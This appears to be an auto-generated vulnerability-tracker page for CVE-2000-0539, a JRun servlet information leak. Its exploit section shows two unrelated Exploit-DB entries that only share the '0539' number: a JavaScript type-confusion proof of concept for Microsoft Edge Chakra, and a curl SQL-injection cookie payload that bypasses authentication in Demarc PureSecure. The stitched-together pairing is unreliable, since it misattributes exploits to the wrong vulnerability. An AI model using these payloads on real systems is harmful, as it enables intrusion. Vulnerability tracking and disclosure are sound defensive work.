CVE-2000-0539
published 2000-06-22CVE-2000-0539: Servlet examples in Allaire JRun 2.3.x allow remote attackers to obtain sensitive information, e.g. listing HttpSession ID's via the SessionServlet servlet.
PriorityP413medium6.4CVSS 2.0
AVNACLAuNCPIPAN
EPSS
1.62%
73.0th percentile
Servlet examples in Allaire JRun 2.3.x allow remote attackers to obtain sensitive information, e.g. listing HttpSession ID's via the SessionServlet servlet.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| macromedia | jrun | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Edge Chakra - 'InitClass' Type Confusion
exploitdb·2019-01-18
CVE-2019-0539 Microsoft Edge Chakra - 'InitClass' Type Confusion
Microsoft Edge Chakra - 'InitClass' Type Confusion
---
/*
Issue description
This is similar to issue 1702 (https://www.exploit-db.com/exploits/46203) . This time, it uses an InitClass instruction to reach the SetIsPrototype method.
PoC:
*/
function opt(o, c, value) {
o.b = 1;
class A extends c {
}
o.a = value;
}
function main() {
for (let i = 0; i < 2000; i++) {
let o = {a: 1, b: 2};
opt(o, (function () {}), {});
}
let o = {a: 1, b: 2};
let cons = function () {};
cons.prototype = o;
opt(o, cons, 0x1234);
print(o.a);
}
main();
Exploit-DB
Demarc PureSecure 1.0.5 - Authentication Check SQL Injection
exploitdb·2002-04-15
CVE-2002-0539 Demarc PureSecure 1.0.5 - Authentication Check SQL Injection
Demarc PureSecure 1.0.5 - Authentication Check SQL Injection
---
source: https://www.securityfocus.com/bid/4520/info
Demarc PureSecure is a commercially available graphical front-end for Snort, in addition to being a generalized network monitoring solution. Snort is an open-source NIDS (Network Intrusion Detection System). Demarc PureSecure will run on most Linux and Unix variants, as well as Microsoft Windows NT/2000/XP operating systems.
A vulnerability has been reported in some versions of PureSecure. User supplied input is used to construct a SQL statement, allowing SQL injection attacks. Administrative access may be gained through exploitation of this flaw.
curl -b s_key=\'%20OR%20current_session_id%20like%20\'%\'%23 https:///dm/demarc
No writeups or analysis indexed.
http://www.allaire.com/handlers/index.cfm?ID=16290&Method=Fullhttp://www.osvdb.org/818http://www.securityfocus.com/bid/1386https://exchange.xforce.ibmcloud.com/vulnerabilities/4774http://www.allaire.com/handlers/index.cfm?ID=16290&Method=Fullhttp://www.osvdb.org/818http://www.securityfocus.com/bid/1386https://exchange.xforce.ibmcloud.com/vulnerabilities/4774
2000-06-22
Published